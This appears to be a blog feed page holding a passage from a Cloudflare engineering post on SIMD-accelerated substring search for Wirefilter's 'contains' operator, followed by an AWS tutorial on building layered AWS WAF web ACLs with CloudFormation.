By now, you shouldn’t be surprised that the contains operator was one of the first in line for optimization. If you’ve ever written a Firewall Rule, you’re probably already familiar with what it does — it checks whether a substring is present in the field you are matching against. For example, the following expression would match when the host is “example.com” or “www.example.net”, but not when it is “cloudflare.com”. In string searching algorithms, this is commonly referred to as finding a ‘needle’ (“example”) within a ‘haystack’ (“example.com”).

http.host contains "example"

How does this work under the hood? Ordinarily, we might have used Rust’s `String::contains` function, but Wirefilter also allows raw byte expressions that don’t necessarily conform to UTF-8.

http.host contains 65:78:61:6d:70:6c:65

We therefore used the memmem crate which performs a two-way substring search algorithm on raw bytes.
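A minimal usage sketch, shown with the memmem API as it exists in the memchr crate today (the exact crate version used at the time may have differed):

use memchr::memmem;

fn main() {
    // Two-way search over raw bytes: no UTF-8 requirement on either side.
    assert_eq!(memmem::find(b"example.com", b"example"), Some(0));
    assert_eq!(memmem::find(b"cloudflare.com", b"example"), None);
    println!("substring checks passed");
}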

Sounds good, right? It was, and it was working pretty well, although we’d noticed that, bizarrely, rewriting `contains` filters as regular expressions could often make them faster.

http.host matches "example"

Regular expressions are great, but since they’re far more powerful than the `contains` operator, they shouldn’t be faster than a specialized algorithm in simple cases like this one.

Something was definitely up. It turns out that Rust’s regex library comes equipped with a whole host of specialized matchers for what it deems to be simple expressions like this. The obvious question was whether we could therefore simply use the regex library. Interestingly, you may not have realized that the popular ripgrep tool does just that when searching for fixed-string patterns.

However, our use case is a little different. Since we’re building an interpreter (and we’re using dynamic dispatch in any case), we would prefer to dispatch to a specialized case for `contains` expressions, rather than matching on some enum deep within the regex crate when the filter is executed. What’s more, there are some pretty cool things being done to perform substring searching that leverage SIMD instruction sets. So we wired up our engine to some previous work by Wojciech Muła and the results were fantastic.

Benchmark | Improvement
Expressions using `contains` operator | 72.3%
‘Simple’ expressions | 0.0%
All expressions | 31.6%
Improvements in instruction count using Wojciech Muła’s sse4-strstr library over the memmem crate with Wirefilter.

I encourage you to read more on “Algorithm 1”, which we used, but it works something like this (I’ve changed the order a little to help make it clearer). It’s worth reading up on SIMD instructions if you’re unfamiliar with them — they’re the essence behind what makes this algorithm fast.

  1. We fill one SIMD register with the first byte of the needle being searched for, simply repeated over and over.
  2. We load as much of our haystack as we can into another SIMD register and perform a bitwise equality operation with our previous register.
  3. Now, any position in the resultant register that is 0 cannot be the start of the match since it doesn’t start with the same byte of the needle.
  4. We now repeat this process with the last byte of the needle, offsetting the haystack, to rule out any positions that don’t end with the same byte as the needle.
  5. Bitwise ANDing these two results together, we (hopefully) have now drastically reduced our potential matches.
  6. Each of the remaining potential matches can be checked manually using a memcmp operation. If we find a match, then we’re done.
  7. If not, we continue with the next part of our haystack and repeat until we’ve checked the entire thing.
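To make these steps concrete, here is a scalar sketch of the same idea using the SWAR (u64) flavour mentioned later in this post, checking eight candidate positions per iteration. It illustrates the algorithm and is not the sse4-strstr code itself:

const LO: u64 = 0x0101_0101_0101_0101;
const HI: u64 = 0x8080_8080_8080_8080;

// Repeat one byte across all eight lanes of a u64 (step 1).
fn broadcast(b: u8) -> u64 {
    LO * b as u64
}

// Classic zero-byte detector: sets the high bit of every zero byte in x.
// It can also flag a stray 0x01 sitting above a zero byte, but such false
// positives are filtered out by the verification step below.
fn zero_bytes(x: u64) -> u64 {
    x.wrapping_sub(LO) & !x & HI
}

fn swar_find(haystack: &[u8], needle: &[u8]) -> Option<usize> {
    let n = needle.len();
    if n == 0 || haystack.len() < n {
        return None;
    }
    let first = broadcast(needle[0]);
    let last = broadcast(needle[n - 1]);
    let mut i = 0;
    while i + n + 7 <= haystack.len() {
        // Steps 2-4: load the bytes where candidates would start and end.
        let head = u64::from_le_bytes(haystack[i..i + 8].try_into().unwrap());
        let tail = u64::from_le_bytes(haystack[i + n - 1..i + n + 7].try_into().unwrap());
        // Step 5: a candidate survives only if both first and last bytes match.
        let mut mask = zero_bytes(head ^ first) & zero_bytes(tail ^ last);
        // Step 6: verify each surviving candidate with a full comparison.
        while mask != 0 {
            let offset = (mask.trailing_zeros() / 8) as usize;
            if &haystack[i + offset..i + offset + n] == needle {
                return Some(i + offset);
            }
            mask &= mask - 1; // clear the lowest candidate bit
        }
        i += 8; // step 7: move on to the next part of the haystack
    }
    // Scalar fallback for the tail that no longer fills a full u64.
    while i + n <= haystack.len() {
        if &haystack[i..i + n] == needle {
            return Some(i);
        }
        i += 1;
    }
    None
}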

When it goes wrong

You may be wondering what happens if our haystack doesn’t fit neatly into registers. In the original algorithm, nothing: it simply continues reading past the end of the haystack until the last register is full, and uses a bitmask to ignore potential false positives from this additional region of memory.

As we mentioned, security is our priority when it comes to optimizations, so we could never deploy something with this kind of behaviour. We ended up porting Muła’s library to Rust (we’ve also open-sourced the crate!) and performed an overlapping registers modification found in ARM’s blog.

It’s best illustrated by example — notice the difference between how we would fill registers on an imaginary SIMD instruction-set with 4-byte registers.

Before modification

How registers are filled in the original implementation for the haystack “abcdefghij”; red squares indicate out-of-bounds memory.

After modification

How registers are filled with the overlapping modification for the same haystack; notice how ‘g’ and ‘h’ each appear in two registers.

In our case, repeating some bytes within two different registers will never change the final outcome, so this modification is allowed as-is. However, in reality, we found it was better to use a bitmask to exclude repeated parts of the final register and minimize the number of memcmp calls.

What if the haystack is too small to even fill a single register? In this case, we can’t use our overlapping trick since there’s nothing to overlap with. Our solution is straightforward: while we were primarily targeting AVX2, which can store 32 bytes in a lane, we can easily move down to another instruction set with smaller registers that the haystack can fit into. In reality, we don’t currently go any smaller than SSE2. Beyond this, we instead use an implementation of the Rabin-Karp searching algorithm, which appears to perform well.
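For reference, a compact Rabin-Karp sketch for such short haystacks (illustrative, not the exact fallback used in sliceslice; base 256 with wrapping arithmetic keeps it short, so the weak hash is backed by a full comparison):

fn rabin_karp(haystack: &[u8], needle: &[u8]) -> Option<usize> {
    let n = needle.len();
    if n == 0 || haystack.len() < n {
        return None;
    }
    const B: u32 = 256;
    let hash = |s: &[u8]| s.iter().fold(0u32, |h, &b| h.wrapping_mul(B).wrapping_add(b as u32));
    let target = hash(needle);
    // B^(n-1), used to remove the outgoing byte from the rolling hash.
    let pow = (1..n).fold(1u32, |p, _| p.wrapping_mul(B));
    let mut h = hash(&haystack[..n]);
    for i in 0..=haystack.len() - n {
        // A hash match is only a candidate; verify it with a real comparison.
        if h == target && &haystack[i..i + n] == needle {
            return Some(i);
        }
        if i + n < haystack.len() {
            h = h.wrapping_sub((haystack[i] as u32).wrapping_mul(pow))
                .wrapping_mul(B)
                .wrapping_add(haystack[i + n] as u32);
        }
    }
    None
}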

Instruction set | Register size
AVX2 | 32 bytes
SSE2 | 16 bytes
SWAR (u64) | 8 bytes
SWAR (u32) | 4 bytes
Register sizes in different SIMD instruction sets [3]. We did not consider AVX512 since support for this is not widespread enough.

Is it always fast?

Choosing the first and last bytes of the needle to rule out potential matches is a great idea. It means that when it does come to performing a memcmp, we can ignore these, as we know they already match. Unfortunately, as Muła points out, this also makes the algorithm susceptible to a worst-case attack in some instances.

Let’s give an expression that a customer might write to illustrate this.

http.request.uri.path contains "/wp-admin/"

If we try to search for this within a very long sequence of ‘/’s, we will find a potential match at every position and make lots of calls to memcmp — essentially performing a slow brute-force substring search.

Clearly we need to choose different bytes from the needle. But which ones should we choose? For each choice, an adversary can always find a slightly different, but equally troublesome, worst case. We instead use randomness to throw off our would-be adversary, picking the first byte of the needle as before, but then choosing another random byte to use.

Our new version is unsurprisingly slower than Muła’s, yet it still exhibits a great improvement over both the memmem and regex crates. Performance, but without sacrificing safety.

Benchmark                             | Improvement with sse4-strstr (original) | Improvement with sliceslice (our version)
Expressions using `contains` operator | 72.3%                                   | 49.1%
‘Simple’ expressions                  | 0.0%                                    | 0.1%
All expressions                       | 31.6%                                   | 24.0%

Improvements in instruction count of using sse4-strstr and sliceslice over the memmem crate with Wirefilter.

What’s next?

This is only a small taste of the performance work we’ve been doing, and we have much more yet to come. Nevertheless, none of this would have been possible without the support of my manager Richard and my mentor Elie, who contributed a lot of these ideas. I’ve learned so much over the past few months, but most of all that Cloudflare is an amazing place to be an intern!

[1] Since our benchmarks are not run within a production environment, results in this post do not represent traffic on our edge.

[2] We found instruction counts to be a particularly stable measure, and CPU cycles a particularly unstable one.

[3] Note that SWAR is technically not an instruction set; it instead uses regular general-purpose registers as if they were vector registers.

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)

Post Syndicated from Daniel Swart original https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications.

In part 1 of this post, I described the technologies and methods that you can use to build and manage defense in depth for your network. In part 2, I show you how to use those tools, with AWS Managed Rules as the starting point, to build your defense in depth for optimal effectiveness.

You can manage policies for multiple environments with minimal administrative overhead, and policy management can now be part of a deployment pipeline in which you programmatically enforce broad edge network policies and protect production workloads without compromising development speed or safety.

Building robust security policy enforcement relies on a layered approach, and the same applies to securing your web applications. Having edge policies, application policies, and even private or internal policy enforcement layers gives you greater visibility into communication requests as well as unified policy enforcement.

Using a layered AWS WAF deployment, such as the one deployed by the procedure that follows, gives you greater flexibility in the number of rules you can use and the option to standardize edge policies and production policies. This lets you test and develop new applications without compromising the production environments.

In the following example, the application load balancer is in us-east-1. To create a web ACL for Amazon CloudFront, you need to deploy the stack in us-east-1. The Amazon-CloudFront-Application-Load-Balancer-AMR.yml template can create both web ACLs in this scenario.

Note: If you’re using CloudFront and hosting the origin in us-east-1, you only need to maintain one stack. If your origin is in another region, you need to deploy one stack in us-east-1 for the CloudFront web ACL and another in the region where your application load balancer is; that scenario isn’t covered in the following procedure. The example AWS CloudFormation templates provided deploy only the AWS WAF configurations, not the underlying infrastructure.

Solution overview

The following diagram illustrates the traffic flow: traffic comes in via CloudFront and is passed to the backend load balancers. Both CloudFront and the load balancers support AWS WAF, which is where dedicated web security policies can be enforced to build defense-in-depth, multi-layered policy enforcement.
 

Figure 1: Defense in depth deployment on AWS WAF

Creating AWS Managed Rule web ACLs

During this process, we create two web ACLs designed for policy enforcement at two dedicated layers. The process won’t deploy the required infrastructure, such as the CloudFront distribution or application load balancers. This example template deploys a single stack in us-east-1, where the CloudFront origin load balancer is located.

To create AWS Managed Rule web ACLs

  1. Download the Amazon-CloudFront-Application-Load-Balancer-AMR.yml template.
  2. Open the AWS Management Console and select the region where the origin application load balancer is deployed. The Amazon-CloudFront-Application-Load-Balancer-AMR.yml template that you downloaded deploys both web ACLs for CloudFront and the application load balancer.
     
    Figure 2: Select a region from the console

  3. Under Find Services, enter AWS CloudFormation and press Enter.
     
    Figure 3: Find and select AWS CloudFormation

  4. Select Create stack.
     
    Figure 4: Create stack

  5. Select a template file for the stack.
    1. In the Create stack window, select Template is ready and Upload a template file.
    2. Under Upload a template file, select Choose file and select the Amazon-CloudFront-Application-Load-Balancer-AMR.yml example AWS CloudFormation template you downloaded earlier.
    3. Choose Next.
    Figure 5: Prepare and choose a template

  6. Add stack details.
    1. Enter a name for the stack in Stack name.
    2. Enter a name for the Edge Network AWS WAF WebACL and for the Public Layer AWS WAF WebACL.
    3. Set a rate limit for HTTP GET requests in HTTP Get Flood Protection (this rate is applied per IP address over a 5-minute period).
    4. Set a rate limit for HTTP POST requests in HTTP Post Flood Protection.
    5. Use the Login URL to apply the POST limit to a targeted login page; if you want to rate-limit all HTTP POST requests, leave the Login URL section blank.
    Figure 6: Set stack details

  7. By default, all the rules within the rule sets are in action override (count mode); this does not include the rate-based rules. If you want to deploy selected rules in block mode, remove them from the pre-populated list by highlighting and deleting them. It’s best practice to evaluate firewall rules in count mode before switching them to block mode. Choose Next to move to the next step.
     
    Figure 7: Default managed rules options

  8. Here you can add tags to apply to the resources in the stack that these rules will be deployed to. Tagging is a recommended best practice because it enables you to add metadata to resources during creation. For more information on tagging, see the Tagging AWS resources documentation. Then choose Next. On the following page, choose Create stack.
     
    Figure 8: Add tags

  9. Wait until the stack has been deployed. When deployment is complete, the status of the stack will change to CREATE_COMPLETE.
     
    Figure 9: Stack deployment status

Associating the web ACLs to resources

During this process, we associate the two newly created web ACLs with the corresponding infrastructure resources: in this example, the CloudFront distribution and its origin load balancer, which should have been created beforehand.

To associate the web ACLs to resources

  1. In the console search for and select WAF & Shield.
     
    Figure 10: Select WAF & Shield

  2. Select Web ACLs from the list on the left.
     
    Figure 11: Select Web ACLs

  3. Select Global (CloudFront) from the drop-down list at the top of the page. Choose the Edge-Network-Layer-WebACL name that you created in step 6 of the previous procedure (Creating AWS Managed Rule web ACLs).
     
    Figure 12: Select the web ACL

  4. Next, select Associated AWS resources and then choose Add AWS resources.
     
    Figure 13: Add AWS resources

  5. Select the CloudFront distribution you want to protect. Choose Add.
     
    Figure 14: Select the CloudFront distribution to protect

  6. Now repeat the association for the application layer. Select the region the application load balancer is deployed in (us-east-1 in this example) by choosing US East (N. Virginia) from the drop-down list at the top of the page. Then, as in steps 2 through 5, select Web ACLs, choose the Public-Application-Layer-WebACL name that you created in step 6 of the previous procedure (Creating AWS Managed Rule web ACLs), and add AWS resources; this time, select the application load balancer that serves as the CloudFront distribution’s origin.
     
    Figure 15: Application layer Web ACL association
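
If you’d rather script this association step as part of a deployment pipeline, the regional half of it maps to a single AssociateWebACL API call. Below is a hedged sketch using the AWS SDK for Rust (the aws-sdk-wafv2 crate); both ARNs are placeholders you would replace with your own, and note that the CloudFront association is configured on the distribution itself rather than through this API.

```rust
use aws_sdk_wafv2 as wafv2;

// Sketch only: associates the application-layer web ACL with the origin
// application load balancer. Requires the `tokio`, `aws-config`, and
// `aws-sdk-wafv2` crates; both ARNs below are placeholders.
#[tokio::main]
async fn main() -> Result<(), wafv2::Error> {
    let config = aws_config::load_from_env().await;
    let client = wafv2::Client::new(&config);

    client
        .associate_web_acl()
        .web_acl_arn("arn:aws:wafv2:us-east-1:111122223333:regional/webacl/Public-Application-Layer-WebACL/EXAMPLE-ID")
        .resource_arn("arn:aws:elasticloadbalancing:us-east-1:111122223333:loadbalancer/app/my-origin-alb/0123456789abcdef")
        .send()
        .await?;

    println!("Web ACL associated with the application load balancer.");
    Ok(())
}
```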

Conclusion

By using AWS WAF to manage a multi-layer web application security enforcement policy, you can build a defense-in-depth stack for each specific web application. The configuration helps you maintain and deploy web application firewall configurations across deployment stages and across different types of applications. With AWS Managed Rules, you can make use of prebuilt rule sets that are easily deployed to create a layered defense that fits into your web application deployment pipelines. If you would like to centrally manage and control AWS WAF across your AWS Organization, consider AWS Firewall Manager.

The AWS CloudFormation templates used in this procedure are in this GitHub repository.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS WAF forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Daniel Cisco Swart

Daniel worked personally on AWS Managed Rules over a number of years during his time with the AWS Threat Research Team. Currently, Daniel works with security competency technology partners from the AWS Partner Network as a Partner Solutions Architect, enabling customer success through technical collaboration with AWS’s top security partners.